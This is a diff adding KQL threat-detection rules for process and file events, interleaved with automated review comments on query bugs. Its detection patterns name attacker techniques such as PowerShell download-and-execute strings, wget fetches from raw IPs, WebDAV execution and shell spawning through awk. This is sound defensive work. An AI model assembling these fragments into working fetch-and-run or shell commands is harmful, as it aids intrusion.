+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql b/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql
new file mode 100644
index 00000000..97f6799a
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Execution From Internet Hosted WebDav Share
+// Author: pH-T (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql b/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql
new file mode 100644
index 00000000..6f4199fb
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql
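Review bot: `FolderPath contains "\\cmd.exe"` is looser than the `FolderPath endswith` form every other rule in this batch uses for image matching, and would also accept a path in which `\cmd.exe` is merely a directory component. Use `FolderPath endswith "\\cmd.exe"` so the image test is consistent with the `ProcessVersionInfoOriginalFileName =~ "Cmd.EXE"` alternative beside it.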
@@ -0,0 +1,10 @@
+// Title: Suspicious Greedy Compression Using Rar.EXE
+// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-12-15
+// Level: high
+// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_installer_package_child_process.kql b/KQL/rules/Execution/suspicious_installer_package_child_process.kql
new file mode 100644
index 00000000..760de8a1
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_installer_package_child_process.kql
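Review bot: `ProcessCommandLine contains ":\*."` carries a single backslash inside a double-quoted Kusto string, while every other literal backslash in this batch is written `\\`; `\*` is not a recognised escape in a Kusto string literal, so this looks like an escaping slip that will either fail to parse or not match the intended `:\*.` text. Write it as `":\\*."`, or use the verbatim form `@":\*."`. Separately, the repeated `ProcessCommandLine contains " "` conjuncts are true for any command line that contains a space and can be dropped without changing what the rule matches.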
@@ -0,0 +1,12 @@
+// Title: Suspicious Installer Package Child Process
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: medium
+// Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
+// MITRE Tactic: Execution
+// Tags: attack.t1059, attack.t1059.007, attack.t1071, attack.t1071.001, attack.execution, attack.command-and-control
+// False Positives:
+// - Legitimate software uses the scripts (preinstall, postinstall)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "preinstall" or ProcessCommandLine contains "postinstall") and (FolderPath endswith "/sh" or FolderPath endswith "/bash" or FolderPath endswith "/dash" or FolderPath endswith "/python" or FolderPath endswith "/ruby" or FolderPath endswith "/perl" or FolderPath endswith "/php" or FolderPath endswith "/javascript" or FolderPath endswith "/osascript" or FolderPath endswith "/tclsh" or FolderPath endswith "/curl" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath endswith "/package_script_service" or InitiatingProcessFolderPath endswith "/installer")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql b/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql
new file mode 100644
index 00000000..53894525
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Interactive PowerShell as SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-07
+// Level: high
+// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Administrative activity
+// - PowerShell scripts running as SYSTEM user
+
+DeviceFileEvents
+| where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql
new file mode 100644
index 00000000..193d7064
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Invocation of Shell via AWK - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function.
+This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains "BEGIN {system" and (FolderPath endswith "/awk" or FolderPath endswith "/gawk" or FolderPath endswith "/mawk" or FolderPath endswith "/nawk"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql
new file mode 100644
index 00000000..caa45b9c
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql
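Review bot: The second line of the description, `+This behavior is commonly associated with ...`, is emitted without the `//` comment prefix, so the generated .kql file holds a bare prose line ahead of `DeviceProcessEvents` and will not parse. Every wrapped line of a multi-line Sigma description needs its own prefix, i.e. `// This behavior is commonly associated with attempts to execute arbitrary commands ...`. This looks like a converter-side issue rather than a one-off: the rsync rule in the next hunk shows the same blank-line handling after its description, though there the extra line is empty and harmless.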
@@ -0,0 +1,11 @@
+// Title: Suspicious Invocation of Shell via Rsync
+// Author: Florian Roth
+// Date: 2025-01-18
+// Level: high
+// Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.t1203
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/ash" or FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath endswith "/rsync" or InitiatingProcessFolderPath endswith "/rsyncd")) and (not(ProcessCommandLine contains " -e "))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_java_children_processes.kql b/KQL/rules/Execution/suspicious_java_children_processes.kql
new file mode 100644
index 00000000..b8db8b0d
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_java_children_processes.kql
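Review bot: `not(ProcessCommandLine contains " -e ")` inspects the spawned shell's own command line, but the `-e` flag the description refers to is the one given to rsync, i.e. the parent. If that reading is right the exclusion belongs on the parent: `and (not(InitiatingProcessCommandLine contains " -e "))`; as written, a legitimate `rsync -e` invocation whose child shell does not itself carry ` -e ` still matches. Worth checking which field the upstream Sigma rule filters on before changing it.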
@@ -0,0 +1,10 @@
+// Title: Suspicious Java Children Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects java process spawning suspicious children
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql b/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql
new file mode 100644
index 00000000..79d8a015
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql
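Review bot: `ProcessCommandLine contains "dash"`, `"fish"`, `"ksh"` and `"python"` are bare substrings, so any Java child whose arguments happen to contain them (a `dashboard` path, a `python` directory on a classpath) trips a high-severity rule. Since DeviceProcessEvents exposes the child image, anchoring the interpreter set on it in the style the macOS Office rule in the next hunk already uses — `FolderPath endswith "/bash" or FolderPath endswith "/dash" or ...` — keeps the intent while cutting that noise; the `/bin/sh` entry can stay on the command line if `sh -c` strings are the target.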
@@ -0,0 +1,10 @@
+// Title: Suspicious Microsoft Office Child Process - MacOS
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059.002, attack.t1137.002, attack.t1204.002
+
+DeviceProcessEvents
+| where (FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osacompile" or FolderPath endswith "/osascript" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/python" or FolderPath endswith "/python3" or FolderPath endswith "/wget") and (InitiatingProcessFolderPath contains "Microsoft Word" or InitiatingProcessFolderPath contains "Microsoft Excel" or InitiatingProcessFolderPath contains "Microsoft PowerPoint" or InitiatingProcessFolderPath contains "Microsoft OneNote")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql b/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql
new file mode 100644
index 00000000..9c19282b
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Mshta.EXE Execution Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-17
+// Level: high
+// Description: Detects suspicious mshta process execution patterns
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta")))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_nohup_execution.kql b/KQL/rules/Execution/suspicious_nohup_execution.kql
new file mode 100644
index 00000000..54098102
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_nohup_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Nohup Execution
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects execution of binaries located in potentially suspicious locations via "nohup"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/nohup"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_outlook_child_process.kql b/KQL/rules/Execution/suspicious_outlook_child_process.kql
new file mode 100644
index 00000000..cb6d6729
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_outlook_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Outlook Child Process
+// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
+// Date: 2022-02-28
+// Level: high
+// Description: Detects a suspicious process spawning from an Outlook process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"
\ No newline at end of file 
diff --git a/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
new file mode 100644
index 00000000..55de894c
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-14
+// Level: high
+// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql b/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql
new file mode 100644
index 00000000..84cf0d77
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell Download and Execute Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-28
+// Level: high
+// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Software installers that pull packages from remote systems and execute them
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile("
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql b/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql
new file mode 100644
index 00000000..9fdde349
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql
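Review bot: The parenthetical in the description, "make sure that your backend applies the strings case-insensitive", is a Sigma-side instruction that the Kusto `contains` operator already satisfies, so a reader of this file may go looking for a switch that does not exist. Either drop the parenthetical from the generated comment or replace it with a note that states the property directly, e.g. `// Note: KQL 'contains' is case-insensitive, as this rule requires.`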
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell Encoded Command Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-24
+// Level: high
+// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Other tools that work with encoded scripts in the command line instead of script files
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql b/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql
new file mode 100644
index 00000000..633a6128
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql
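Review bot: Kusto `contains` is case-insensitive, so `" JAB"`, `" IAB"`, `" PAA"` and the other base64 prefixes also match lower- or mixed-case text such as ` jab` or ` paa` inside ordinary arguments, which is not what these base64-specific markers are meant to catch. Base64 is case-sensitive, so `contains_cs` is the better fit for this group (`ProcessCommandLine contains_cs " JAB" or ProcessCommandLine contains_cs " SUVYI" or ...`); the `-e`/`-enc` conjunct limits the false positives in practice, but the case-sensitive form is truer to the indicator and no more expensive.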
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell IEX Execution Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-24
+// Level: high
+// Description: Detects suspicious ways to run Invoke-Execution using IEX alias
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate scripts that use IEX
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql b/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql
new file mode 100644
index 00000000..111b5f53
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql
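Review bot: The Description says `Invoke-Execution`, but `IEX` is the alias for `Invoke-Expression`, so the header misnames the cmdlet the rule is about and will confuse anyone searching the rule set by cmdlet name. Suggest `// Description: Detects suspicious ways to run Invoke-Expression using the IEX alias`. The query itself (Base64 decode piped into iex, or the `);iex` / `|iex` forms) matches the title.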
@@ -0,0 +1,10 @@
+// Title: Suspicious PowerShell Parameter Substring
+// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects suspicious PowerShell invocation with a parameter substring
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv " or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " /NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_parent_process.kql b/KQL/rules/Execution/suspicious_powershell_parent_process.kql
new file mode 100644
index 00000000..efd2aef9
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_powershell_parent_process.kql
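Review bot: Several alternatives in the where clause are subsumed by shorter literals on the same line: `" -win h"` already matches everything that `" -win h "`, `" -win hi "`, `" -win hid "`, `" -win hidd "` and `" -win hidde "` match, and the `/win h` group repeats the same pattern, so those terms change nothing in what fires but make the predicate harder to read and tune. If the converter emits the Sigma list literally, a de-duplication pass that drops any literal whose prefix is already present would shorten this and similar rules without altering results.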
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell Parent Process
+// Author: Teymur Kheirkhabarov, Harish Segar
+// Date: 2020-03-20
+// Level: high
+// Description: Detects a suspicious or uncommon parent processes of PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Other scripts
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" 